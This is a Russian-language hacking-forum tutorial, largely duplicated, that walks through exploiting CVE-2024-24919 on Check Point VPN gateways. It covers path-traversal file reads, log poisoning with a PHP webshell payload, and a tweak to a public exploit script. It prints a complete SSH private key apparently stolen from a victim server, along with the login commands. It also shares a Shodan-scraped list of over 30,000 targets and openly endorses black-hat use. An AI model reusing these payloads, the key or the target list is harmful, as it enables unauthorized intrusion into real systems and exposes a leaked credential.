Специально для лучшего форума: Автор: k0priz
И так по запросам форумчан, очень извиняюсь за столь долгую задержку в выпуске очень большие проблемы в жизни,но сейчас не об этом, пишу продолжение статьи где мы получим доступ.
Как мы все помним использовали мы CVE-2024-24919 а это уязвимость раскрытия информации ну или lfi.
CVE-2024-24919 — это уязвимость раскрытия информации, которая может позволить злоумышленнику получить доступ к определенной информации на подключенных к Интернету шлюзах, которые настроены с использованием IPSec VPN, VPN удаленного доступа или программного блейда мобильного доступа. Согласно сообщению, Check Point наблюдала эксплуатацию этой уязвимости в реальных условиях, и до сих пор эта деятельность по эксплойту была сосредоточена на устройствах, настроенных с использованием локальных учетных записей и аутентификации только по паролю.
PoC: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
Информационная сноска
-------------------------
Уязвимость LFI (Local File Inclusion) — это тип уязвимости, связанный с несанкционированным доступом к файлам на сервере, который возникает, когда приложение позволяет злоумышленнику включать произвольные файлы с сервера через вводимые данные. Обычно такая уязвимость возникает в веб-приложениях, когда параметры запроса (например, имя файла) не проходят должной валидации и могут быть изменены пользователем.
// Уязвимый код с использованием параметра 'page'
$page = $_GET['page'];
include($page);
-------------------------
А значит что мы можем прочитать почти ЛЮБОЙ ФАЙЛ начинаем вспоминать мат часть линукса а имеено ее дирекотрии.
Самый первый вариант который должен приходить это /etc/ кладись конфигурационных файлов.
Интересные директории:
Немного расскажу про базовую интерпретацию lfi.
На гите валяется скрипт для теста:
Вводим произвольные символы и видим уязвимый параметр
Вот тут как раз начинаем вспоминать что писать сверху.
PHP: Скопировать в буфер обмена
пробуем базовую проверку
так, уязвимость есть , пробуем получить RCE, для этого нам понадобяться такая вещь как Log Poisoning.
Информационная сноска:
-------------------------------
Log Poisoning - это распространенный метод, используемый для получения команды от уязвимости LFI. Чтобы это сработало, хакер пытается внедрить вредоносные данные в журнал сервера.
В реальном приложении попытайтесь определить используемый сервер (например, Apache, Nginx). Это можно определить с помощью журналов ошибок, страницы сервера по умолчанию и заголовков ответов. Например, для сервера Apache файл журнала будет храниться в /var/log/apache2/error.log, а для Nginx — в /var/log/nginx/access.log
-------------------------------
тут нам уже понадобиться burpsuite
Ловим реквест с сервака и кидаем его в Repeater
Пробуем получить журнал ошибок сервера logs/access.log
так доступ к журналу есть, значит пробуем пронести наш код
Биного, работает и видим что мы группы root, делаем простой webshell командой
Теперь пишием /local_file_inclusion.php?page=logs/access.log&cmd=ls
И видим такую картину:
Все что такое lfi поняли и как даже получить через него RCE тоже, так что продолжаем.
Опять же как правильно подметили под прошлой статьей "заебешься хэши хэшить" если говорить о масовом взломе, я мог бы просто найти сервак разхэшить хэш да и все, но это не интерсено, все таки професия творческая.
Предложили действительно не плохой вариант /.ssh/id-rsa
Информационная сноска:
-------------------------
Файл id_rsa является приватным ключом SSH, который используется для аутентификации при подключении к удаленным серверам и другим системам. Этот ключ эксплуатируется вместе с файлом id_rsa.pub, который является соответствующим публичным ключом.
-------------------------
Так как мы теперь знаем как можно получить RCE, лист пэйлоадов будет таким:
Использовать будем этот сплоит https://github.com/RevoltSecurities/CVE-2024-24919.git
Для вашего удобства в 95 строчке вместо
Бывает пишет что vuln, но статус код 404.
По итогам скана к сожалению логов не нашлось, а я очень хотел показать эту уязвимость(в дальнейшем думаю напишу и про это) но будем показывать через id_rsa.
так вот мы имеем ключ:
Код: Скопировать в буфер обмена
но перед тем как подключатсья нужно подготовиться
создаем файл в любой директории id_rsa
туда впихиваем наш ключ
в нем обязательно должно быть
-----BEGIN OPENSSH PRIVATE KEY-----
base64
-----END OPENSSH PRIVATE KEY-----
после этого сохроняем и пишем команду
далле пишем
Информационная сноска
-------------------------
Когда в командной строке при подключении через SSH указывают параметр -o HostKeyAlgorithms=+ssh-rsa, это означает, что в процессе аутентификации SSH-сессии явно разрешается использование алгоритма ssh-rsa для проверки подлинности удалённого хоста.
HostKeyAlgorithms — это настройка в SSH-клиенте, которая определяет, какие алгоритмы ключей хостов (серверов) могут быть использованы для проверки подлинности сервера при установлении соединения.
+ssh-rsa — знак + в данном контексте добавляет алгоритм ssh-rsa в список допустимых алгоритмов. Это может быть полезно, если по каким-то причинам SSH-сервер или клиент по умолчанию не поддерживает этот алгоритм, но вы хотите его явно разрешить.
-------------------------
Вауля мы на сервере:
Все гениальное просто, творите и изучайте!!!
Оставлю вам файлик который спарсил с shodan если кто сам захочет попробовать.
https://dropmefiles.com/OOS65 там 30+к сайтов думаю есть над чем практиковаться.
Если статья понравилась и кто то захочет помочь автору, то это очень сильно поможет выходу новых статей, ведь идеи есть. bc1qt8kazyjvpdf0t2asths05drkzamajh90ggdmg7
P.s (Можем проверить OS от одного школо-форума)
!!!ДИСКЛЕЙМЕР!!!
Все мы и так знаем как будут использовать эту информацию так что дисклеймер никчему, black-hat рулит)))
Все мы и так знаем как будут использовать эту информацию так что дисклеймер никчему, black-hat рулит)))
И так по запросам форумчан, очень извиняюсь за столь долгую задержку в выпуске очень большие проблемы в жизни,но сейчас не об этом, пишу продолжение статьи где мы получим доступ.
Как мы все помним использовали мы CVE-2024-24919 а это уязвимость раскрытия информации ну или lfi.
CVE-2024-24919 — это уязвимость раскрытия информации, которая может позволить злоумышленнику получить доступ к определенной информации на подключенных к Интернету шлюзах, которые настроены с использованием IPSec VPN, VPN удаленного доступа или программного блейда мобильного доступа. Согласно сообщению, Check Point наблюдала эксплуатацию этой уязвимости в реальных условиях, и до сих пор эта деятельность по эксплойту была сосредоточена на устройствах, настроенных с использованием локальных учетных записей и аутентификации только по паролю.
PoC: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
Информационная сноска
-------------------------
Уязвимость LFI (Local File Inclusion) — это тип уязвимости, связанный с несанкционированным доступом к файлам на сервере, который возникает, когда приложение позволяет злоумышленнику включать произвольные файлы с сервера через вводимые данные. Обычно такая уязвимость возникает в веб-приложениях, когда параметры запроса (например, имя файла) не проходят должной валидации и могут быть изменены пользователем.
// Уязвимый код с использованием параметра 'page'
$page = $_GET['page'];
include($page);
-------------------------
А значит что мы можем прочитать почти ЛЮБОЙ ФАЙЛ начинаем вспоминать мат часть линукса а имеено ее дирекотрии.
Самый первый вариант который должен приходить это /etc/ кладись конфигурационных файлов.
Интересные директории:
https://github.com/InfoSecWarrior/Offensive-Payloads/blob/main/Linux-Sensitive-Files.txt
Немного расскажу про базовую интерпретацию lfi.
На гите валяется скрипт для теста:
git clone https://github.com/dr34mhacks/operation-file-hunt.git
cd operation-file-hunt
sudo bash runme.sh
Вводим произвольные символы и видим уязвимый параметр
page
Вот тут как раз начинаем вспоминать что писать сверху.
PHP: Скопировать в буфер обмена
Code:
// Уязвимый код с использованием параметра 'page'
$page = $_GET['page'];
include($page);
пробуем базовую проверку
../../../../../../../../../../etc/passwd
так, уязвимость есть , пробуем получить RCE, для этого нам понадобяться такая вещь как Log Poisoning.
Информационная сноска:
-------------------------------
Log Poisoning - это распространенный метод, используемый для получения команды от уязвимости LFI. Чтобы это сработало, хакер пытается внедрить вредоносные данные в журнал сервера.
В реальном приложении попытайтесь определить используемый сервер (например, Apache, Nginx). Это можно определить с помощью журналов ошибок, страницы сервера по умолчанию и заголовков ответов. Например, для сервера Apache файл журнала будет храниться в /var/log/apache2/error.log, а для Nginx — в /var/log/nginx/access.log
-------------------------------
тут нам уже понадобиться burpsuite
Ловим реквест с сервака и кидаем его в Repeater
Пробуем получить журнал ошибок сервера logs/access.log
так доступ к журналу есть, значит пробуем пронести наш код
<?php system('id');?>
- между скобок мы пишем команду которую хотим выполнить тоесть id
.Биного, работает и видим что мы группы root, делаем простой webshell командой
<?php system($_GET['cmd']); ?>
-- тут уже мы создаем переменную и при GET запросе можем проносить свои команды.Теперь пишием /local_file_inclusion.php?page=logs/access.log&cmd=ls
И видим такую картину:
Все что такое lfi поняли и как даже получить через него RCE тоже, так что продолжаем.
Опять же как правильно подметили под прошлой статьей "заебешься хэши хэшить" если говорить о масовом взломе, я мог бы просто найти сервак разхэшить хэш да и все, но это не интерсено, все таки професия творческая.
Предложили действительно не плохой вариант /.ssh/id-rsa
Информационная сноска:
-------------------------
Файл id_rsa является приватным ключом SSH, который используется для аутентификации при подключении к удаленным серверам и другим системам. Этот ключ эксплуатируется вместе с файлом id_rsa.pub, который является соответствующим публичным ключом.
-------------------------
Так как мы теперь знаем как можно получить RCE, лист пэйлоадов будет таким:
/.ssh/id-rsa
/var/log/apache2/error.log
/var/log/nginx/access.log
Использовать будем этот сплоит https://github.com/RevoltSecurities/CVE-2024-24919.git
Для вашего удобства в 95 строчке вместо
if response.status == 200 and "<html" not in responsed or "</html>" not in responsed:
замените на if response.status == 200:
Бывает пишет что vuln, но статус код 404.
По итогам скана к сожалению логов не нашлось, а я очень хотел показать эту уязвимость(в дальнейшем думаю напишу и про это) но будем показывать через id_rsa.
так вот мы имеем ключ:
Код: Скопировать в буфер обмена
Code:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
но перед тем как подключатсья нужно подготовиться
создаем файл в любой директории id_rsa
туда впихиваем наш ключ
в нем обязательно должно быть
-----BEGIN OPENSSH PRIVATE KEY-----
base64
-----END OPENSSH PRIVATE KEY-----
после этого сохроняем и пишем команду
chmod 600 /path/to/id_rsa_file
далле пишем
ssh -i [SIZE=5]/path/to/id_rsa_file[/SIZE] -o HostKeyAlgorithms=+ssh-rsa user@host
Информационная сноска
-------------------------
Когда в командной строке при подключении через SSH указывают параметр -o HostKeyAlgorithms=+ssh-rsa, это означает, что в процессе аутентификации SSH-сессии явно разрешается использование алгоритма ssh-rsa для проверки подлинности удалённого хоста.
HostKeyAlgorithms — это настройка в SSH-клиенте, которая определяет, какие алгоритмы ключей хостов (серверов) могут быть использованы для проверки подлинности сервера при установлении соединения.
+ssh-rsa — знак + в данном контексте добавляет алгоритм ssh-rsa в список допустимых алгоритмов. Это может быть полезно, если по каким-то причинам SSH-сервер или клиент по умолчанию не поддерживает этот алгоритм, но вы хотите его явно разрешить.
-------------------------
Вауля мы на сервере:
Все гениальное просто, творите и изучайте!!!
Оставлю вам файлик который спарсил с shodan если кто сам захочет попробовать.
https://dropmefiles.com/OOS65 там 30+к сайтов думаю есть над чем практиковаться.
Если статья понравилась и кто то захочет помочь автору, то это очень сильно поможет выходу новых статей, ведь идеи есть. bc1qt8kazyjvpdf0t2asths05drkzamajh90ggdmg7
P.s (Можем проверить OS от одного школо-форума)